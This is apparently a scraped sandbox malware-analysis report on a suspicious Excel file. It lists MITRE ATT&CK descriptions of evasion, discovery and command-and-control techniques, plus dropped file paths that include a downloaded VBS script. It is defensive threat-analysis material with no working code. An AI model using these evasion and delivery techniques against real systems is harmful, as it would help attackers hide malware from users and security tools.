Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report P018400.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Exploits

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Leoloverme[1].vbs

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A37739B.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E5F5854.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83CF445.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF28E582.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A088A985-E6D5-4349-B475-13037637E9EB}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92A54BF7-4CBB-4C14-8FA2-A6A7120CDA0D}.tmp

Windows Analysis Report
P018400.xla.xlsx

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre